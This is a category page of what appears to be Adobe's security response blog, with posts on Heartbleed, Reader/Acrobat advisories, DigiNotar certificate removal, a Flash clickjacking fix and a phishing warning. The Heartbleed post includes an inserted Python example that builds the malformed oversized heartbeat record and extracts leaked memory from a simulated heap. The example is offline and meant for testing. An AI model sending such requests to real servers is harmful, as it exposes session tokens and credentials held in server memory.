Posts in Category "Uncategorized"

Adobe Launches Web Application Vulnerability Disclosure Program on HackerOne

In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform. Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score. We invite security researchers to view the disclosure guidelines available here: https://hackerone.com/adobe.

Adobe continues to welcome the coordinated disclosure of security issues affecting desktop products and enterprise on-premise solutions by notifying our Product Security Incident Response Team (PSIRT@adobe.com).

Pieter Ockers
Security Program Manager, PSIRT

Heartbleed Update

Last week, industry security researchers announced a flaw in the OpenSSL encryption software library, known as “Heartbleed” (CVE-2014-0160), which can be used to cause a vulnerable system to reveal up to 64 KB of its process memory to an attacker with each malformed heartbeat request.

Adobe has evaluated the Creative Cloud and its related services (including Behance and Digital Publishing Suite), the Marketing Cloud solutions and products (including Analytics, Analytics Premium and Experience Manager), EchoSign, Acrobat.com, the Adobe.com store, and other Adobe services. All Adobe internet-facing services known to have been using a version of OpenSSL containing the Heartbleed vulnerability have been mitigated. We are continuing our analysis of Adobe internet-facing servers to identify and remediate any remaining Heartbleed-related risks.

Some Adobe products and services do not bundle OpenSSL (such as ColdFusion**, Experience Manager and Experience Manager On-Demand), but they are frequently deployed by customers on-premise or behind third-party web servers, and it is those components that may link against a vulnerable OpenSSL. We advise these customers to test their own deployment and configuration for the Heartbleed vulnerability (CVE-2014-0160) and, if it is present, to follow the recommendations in the OpenSSL security advisory.
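To make the test the paragraph above asks for concrete, the following Python is an added example (it is not Adobe's or OpenSSL's code) that models the CVE-2014-0160 bug offline: an RFC 6520 heartbeat request whose 16-bit payload_length claims far more data than was actually sent, a model of the unpatched handler that trusts that length and copies adjacent memory into the reply, the patched handler's bounds check (which silently discards the message, as the fix does), and the classifier a scanner applies to the reply. Nothing touches the network; the "process memory" (FAKE_HEAP), the payload, and all function names are constructed for the illustration. A real check against a deployment sends the same malformed heartbeat over a live TLS connection and applies the same classification to the record that comes back.

```python
"""Offline model of the Heartbleed (CVE-2014-0160) bounds-check bug.

Added example, not Adobe's code. Heartbeat message layout per RFC 6520:
  type (1 byte) | payload_length (2 bytes) | payload | padding (>= 16 bytes)
"""
import struct

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING_LEN = 16                  # RFC 6520: at least 16 bytes of padding
TLS_HEARTBEAT_CONTENT_TYPE = 24   # TLS record content type for heartbeat


def build_heartbeat(hb_type, claimed_len, payload, padding=b"\x00" * PADDING_LEN):
    """Heartbeat body. claimed_len may disagree with len(payload); that
    mismatch is what triggers the bug."""
    return struct.pack("!BH", hb_type, claimed_len) + payload + padding


def wrap_record(body, version=b"\x03\x02"):
    """Wrap a heartbeat body in a TLS record header (TLS 1.1 version bytes)."""
    return bytes([TLS_HEARTBEAT_CONTENT_TYPE]) + version + struct.pack("!H", len(body)) + body


def parse_record(record):
    """Split a TLS record into (content_type, version, body)."""
    length = struct.unpack("!H", record[3:5])[0]
    return record[0], record[1:3], record[5:5 + length]


def unpatched_handler(record, process_memory):
    """Model of the vulnerable server: copies claimed_len bytes starting at the
    payload, running past the received message into whatever follows it in
    memory (modelled here by the constructed process_memory buffer)."""
    _, version, body = parse_record(record)
    hb_type, claimed_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return None
    heap_view = body[3:] + process_memory          # payload, padding, then "heap"
    leaked_or_echoed = heap_view[:claimed_len]      # the unchecked memcpy
    return wrap_record(build_heartbeat(HB_RESPONSE, claimed_len, leaked_or_echoed), version)


def patched_handler(record, process_memory):
    """Model of the fixed server: discard any heartbeat whose claimed payload
    length does not fit inside the record (1 + 2 + payload + 16 > length)."""
    _, version, body = parse_record(record)
    hb_type, claimed_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + claimed_len + PADDING_LEN > len(body):
        return None                                 # silently dropped
    return wrap_record(build_heartbeat(HB_RESPONSE, claimed_len, body[3:3 + claimed_len]), version)


def heartbleed_check(response, sent_payload):
    """Classify a reply to an oversized heartbeat: 'vulnerable' if it carries
    bytes the client never sent, otherwise 'not vulnerable'."""
    if response is None:
        return "not vulnerable"
    ctype, _, body = parse_record(response)
    if ctype != TLS_HEARTBEAT_CONTENT_TYPE or body[0] != HB_RESPONSE:
        return "not vulnerable"
    returned_len = struct.unpack("!H", body[1:3])[0]
    returned_payload = body[3:3 + returned_len]
    if returned_len > len(sent_payload) and returned_payload[:len(sent_payload)] == sent_payload:
        return "vulnerable"
    return "not vulnerable"


def extract_leak(response, sent_payload):
    """Bytes beyond the echoed payload, i.e. the leaked server memory."""
    _, _, body = parse_record(response)
    returned_len = struct.unpack("!H", body[1:3])[0]
    return body[3 + len(sent_payload):3 + returned_len]


# Constructed demo data: a 4-byte payload with a claimed length of 16384, and a
# constructed "adjacent heap" that happens to hold a session cookie.
SENT_PAYLOAD = b"ping"
CLAIMED_LEN = 0x4000      # the 16-bit field allows up to 65535 (the "64k")
FAKE_HEAP = b"...session=abc123; Authorization: Basic dXNlcjpwYXNz..." * 400
MALICIOUS = wrap_record(build_heartbeat(HB_REQUEST, CLAIMED_LEN, SENT_PAYLOAD))


def demo():
    """Run the malformed request against both handlers and classify each reply."""
    return {name: heartbleed_check(handler(MALICIOUS, FAKE_HEAP), SENT_PAYLOAD)
            for name, handler in (("unpatched", unpatched_handler), ("patched", patched_handler))}


if __name__ == "__main__":
    print(demo())
    leak = extract_leak(unpatched_handler(MALICIOUS, FAKE_HEAP), SENT_PAYLOAD)
    print(len(leak), b"session=abc123" in leak)
```

The classifier deliberately keys on the reply being longer than what was sent rather than on the mere presence of the heartbeat extension: a server that advertises heartbeats but drops the malformed request is patched, and a checker that only inspects the ServerHello extension list would report it as a false positive.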

At this time, Adobe does not plan to initiate a password reset in response to the Heartbleed vulnerability; however, it is always a good practice to change passwords from time to time. We strongly recommend that you change your Adobe password if you use the same user ID and password for your Adobe ID and for accounts on other websites, so that a compromise of your credentials on a non-Adobe service does not put your Adobe ID at risk.

** Update: ColdFusion does ship a version of OpenSSL, but that version is not affected by the Heartbleed vulnerability.

Prenotification: Upcoming Security Updates for Adobe Reader and Acrobat (APSB13-15)

A prenotification Security Advisory has been posted regarding upcoming Adobe Reader and Acrobat updates scheduled for Tuesday, May 14, 2013.

We will continue to provide updates on the upcoming release via the Security Advisory section of the Adobe website as well as the Adobe PSIRT blog.

This posting is provided “AS IS” with no warranties and confers no rights.


Adobe Reader and Acrobat Vulnerability Report

Adobe is aware of a report of a vulnerability in Adobe Reader and Acrobat XI (11.0.1) and earlier versions being exploited in the wild. We are currently investigating this report and assessing the risk to our customers. We will provide an update as soon as we have more information. Please continue monitoring the Adobe PSIRT blog for the latest information.


Clickjacking issue in Adobe Flash Player Settings Manager

Adobe is aware of a report describing a clickjacking issue related to the online Flash Player Settings Manager. We have resolved the issue with a change to the Flash Player Settings Manager SWF file hosted on the Adobe website. No user action or Flash Player product update is required.


Prenotification: Security Update for Flash Player

A Flash Player update is scheduled for release tomorrow, September 21, 2011. This update will address critical security issues in the product as well as an important universal cross-site scripting issue that is reportedly being exploited in the wild in targeted attacks.

We will continue to provide updates on the upcoming release via the Security Advisory section of the Adobe website as well as the Adobe PSIRT blog.


DigiNotar removed from Adobe Approved Trust List (AATL)

As discussed on the Security Matters blog, the Adobe Approved Trust List (AATL) has been updated to remove the certificate authority DigiNotar. Users of Adobe Reader and Acrobat X (version 10.x) will be automatically updated to this list. A future product update of Adobe Reader and Acrobat version 9.x will enable dynamic updates of the AATL. In the meantime, users of Adobe Reader and Acrobat 9 can manually remove DigiNotar using instructions provided in the September 9 blog post.


Update on DigiNotar removal from the Adobe Approved Trust List (AATL)

An update on the removal of the DigiNotar Qualified CA certificate from the Adobe Approved Trust List (AATL) following the recent DigiNotar breach has been posted on the Security Matters blog.


Update on DigiNotar and the Adobe Approved Trust List (AATL)

We are in the process of removing the DigiNotar Qualified CA certificate from the Adobe Approved Trust List (AATL) and will post an update on this action tomorrow.

In the meantime, users can manually remove these certificates from Adobe Reader and Acrobat* by following these steps:
(*Note that the AATL is only supported in Adobe Reader and Acrobat versions 9 and X.)

Adobe Reader Version 9
1) Open Adobe Reader.
2) Open the Document menu and choose Manage Trusted Identities.
3) In the ‘Display’ drop-down box that reads ‘Contacts’, choose ‘Certificates.’
4) Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5) Click Delete, and then confirm the deletion by clicking OK.

Adobe Acrobat Version 9
1) Open Adobe Acrobat.
2) Open the Advanced menu and choose Manage Trusted Identities.
3) In the ‘Display’ drop-down box that reads ‘Contacts’, choose ‘Certificates.’
4) Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5) Click Delete, and then confirm the deletion by clicking OK.

Adobe Reader and Acrobat X
1) Open Adobe Reader or Acrobat.
2) Open the Edit menu and choose Protection > Manage Trusted Identities.
3) In the ‘Display’ drop-down box that reads ‘Contacts’, choose ‘Certificates.’
4) Select the DigiNotar Qualified CA. If you do not see this certificate in the list, no further action is required.
5) Click Delete, and then confirm the deletion by clicking OK.


Alert: Adobe Acrobat/Reader Upgrade Email Spam/Phishing Scam

With the availability of Adobe Acrobat X solutions this week, we remind customers to be cautious of email messages, sent by entities claiming to be Adobe, that purport to offer a download of a new version of Adobe Acrobat or Adobe Reader.

Many of these emails require recipients to register and/or provide personal information. Please be aware that these emails have not been sent by Adobe or on Adobe’s behalf.

Adobe Reader, in particular, is free software available for download directly from the Adobe Reader download page on the Adobe website at http://get.adobe.com/reader/; it is not distributed through any other download channel, including email.

Customers receiving one of these potentially malicious emails should delete the email immediately without clicking on any of the links.